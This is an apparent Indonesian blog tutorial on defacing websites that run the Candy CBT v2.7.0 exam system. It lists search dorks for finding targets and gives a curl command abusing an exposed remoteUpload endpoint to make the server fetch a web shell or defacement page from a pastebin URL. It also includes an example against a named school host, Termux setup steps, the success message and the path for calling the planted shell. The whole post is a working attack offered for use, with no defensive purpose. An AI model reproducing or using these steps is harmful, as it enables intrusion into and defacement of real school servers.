Tutorial Deface Poc CBT RCE

Posting Komentar



Tutorial Deface Poc CBT RCE
BAHAN BAHAN:
Dork:

1."responsive image" + "support" intitle:login intext:"© candy cbt v2.7.0 r0"
2.intext:"© candy cbt v2.7.0 r0" intitle:login

3.intext:"© candy cbt v2.7.0 r0"
4.Intitle:"ujian" inurl:candycbt
5.intitle:"ujian" intext:"candy cbt"

Selengkapnya kalian kembangin GW CAPEEEEE

Command curl

curl http://isi dengan site target/admin/ouh.php -d 'api=remoteUpload&dir=&filename=namashell.php&method=curl&url=Link pastebin shell/sc deface'

oke step by step
Kalian dorking 
Kalau sudah kalian coba salin salah satu web target kalian
Terus kalian copy dan masukan kedalam command curl contoh:
curl http://onlinesmkn1geneng.ip-dynamic.com:9090/butoijo/admin/ifm.php -d 'api=remoteUpload&dir=&filename=zet.php&method=curl&url=https://pastebin.com/raw/R7a8P71a'

Kalau sudah kalian copy command nya.
Lalu kalian pergi ke termux
Lalu kalian ketikan pkg install curl
Kalau sudah kalian tinggal paste commad yg tadi
Kalau ada tulisan:
{"status":"OK","message":"File successfully uploaded."}
Berarti itu artinya berhasil(file sudah terupload)
Cara manggil sc/shellnya gimana?
site.sch.id/files/namashell.php
site.sch.id/[patch]/files/namashell.php

Related Posts

There is no other posts in this category.

Posting Komentar

Subscribe Our Newsletter